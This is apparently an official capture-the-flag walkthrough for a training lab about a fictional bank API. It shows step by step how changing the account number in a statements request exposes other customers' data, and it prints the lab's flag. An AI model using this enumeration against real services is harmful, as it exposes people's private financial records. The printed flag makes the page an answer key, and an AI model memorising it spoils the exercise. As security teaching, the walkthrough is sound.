HACKR.GG
hackr.gg — Account Statements — FirstBank Walkthrough
hackr.gg — Official Walkthrough
Confidential · Educational Use Only

Account Statements — FirstBank

IDOR & Access Control · Insecure Direct Object Reference (IDOR)
Difficulty
Easy
Vuln class
Insecure Direct Object Reference (IDOR)
Steps
3
// Objective
Access account statements belonging to other FirstBank customers by manipulating the account number in the request.
// Tools required
BrowserDeveloper ToolsBurp Suite
// Step-by-step walkthrough
1
Log in and view your own statements
Log in with the provided test credentials. Navigate to Statements. Observe the URL or the API request used to load your statements.
Command / Input
GET /api/statements?account=20001 Authorization: Bearer <your_token>
Output
{"account":"20001","owner":"Test User","transactions":[...]}
2
Test IDOR by changing the account number
Change the account number in the request to a different value. The server should validate that the account belongs to the authenticated user — but it doesn't.
Command / Input
GET /api/statements?account=20002 Authorization: Bearer <your_token>
Output
{"account":"20002","owner":"Alice Thompson","transactions":[...]}
The server returned another customer's statements using your valid token. The only check was authentication (are you logged in?) — not authorisation (does this account belong to you?).
3
Find the flag account
Iterate through account numbers to find the one containing the flag. Try accounts near your own, or well-known numbers like 10000, 99999.
Command / Input
GET /api/statements?account=10001
Output
{"account":"10001","owner":"Admin","flag":"HackrGG{f1rstb4nk_1d0r_4cc0unt_st4t3m3nt}"}
In a real attack this exposes full transaction history, balances, and personal data for every customer on the platform.
// Flag
Flag value
HackrGG{f1rstb4nk_1d0r_4cc0unt_st4t3m3nt}
Found in account #10001 statements using your own authenticated session.
hackr.gg · Cybersecurity Education PlatformEducational use only · Do not distribute